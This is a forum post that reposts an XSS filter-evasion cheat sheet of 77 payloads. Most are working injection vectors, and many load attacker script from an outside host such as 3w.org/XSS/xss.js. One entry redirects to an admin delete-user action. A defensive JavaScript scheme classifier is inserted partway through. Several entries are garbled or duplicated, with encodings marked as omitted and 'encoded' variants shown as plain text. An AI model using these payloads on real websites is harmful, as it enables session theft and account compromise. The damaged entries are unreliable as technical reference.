It seems t00ls has relatively little material on XSS; I saw something good and copied it over, in case any fellow members want to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (XSS calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (XSS calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (XSS calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (XSS calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, since there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
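Added here as a defender-side example, not part of the original post or the cheat sheet it copies: a classifier for javascript:/vbscript: URL attribute values that survives the case, character-reference, tab/newline/null-byte and leading-space tricks in (3)-(19) and (40). It assumes only standard JavaScript; the sample inputs are constructed.

```javascript
const DANGEROUS_SCHEMES = new Set(["javascript", "vbscript"]);

// Decode HTML numeric character references as a lenient HTML parser does:
// "&#106;", "&#x6A;" and the semicolon-less "&#106" / "&#x6A" all become "j".
function decodeNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, num) => {
    const code = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return code > 0 && code <= 0x10ffff ? String.fromCodePoint(code) : match;
  });
}

// Normalize for classification only (never reuse the result as the URL):
// decode references, then drop every C0 control character and space.
// Browsers strip only tab/LF/CR anywhere plus leading/trailing controls;
// being stricter here errs toward rejection, the safe direction for an
// attribute value.
function normalizeForSchemeCheck(raw) {
  return decodeNumericRefs(raw).replace(/[\x00-\x20]/g, "");
}

// Lower-cased scheme of the normalized value, or null if it has none.
function urlScheme(raw) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(normalizeForSchemeCheck(raw));
  return m ? m[1].toLowerCase() : null;
}

function isDangerousUrl(raw) {
  return DANGEROUS_SCHEMES.has(urlScheme(raw));
}

// The naive substring filter these vectors were written to defeat.
function naiveFilter(raw) {
  return raw.includes("javascript:");
}

// Constructed inputs modelled on the vectors above, plus one benign URL.
const SAMPLES = {
  mixedCase: "JaVaScRiPt:alert('XSS')",
  decimalRefs: "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  hexRefsNoSemicolon: "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
  embeddedTab: "jav\tascript:alert('XSS');",
  encodedTab: "jav&#x09;ascript:alert('XSS');",
  embeddedNewline: "jav\nascript:alert('XSS');",
  embeddedNull: "java\0script:alert('XSS')",
  leadingSpace: " javascript:alert('XSS');",
  vbscript: "vbscript:msgbox(\"XSS\")",
  benign: "http://example.com/a.png",
};
```

The practical lesson is that a scheme check must run on the decoded, control-stripped value, and that allowlisting http/https is simpler and safer than blocklisting schemes.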
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside the Flash file, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot (absolute DNS)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>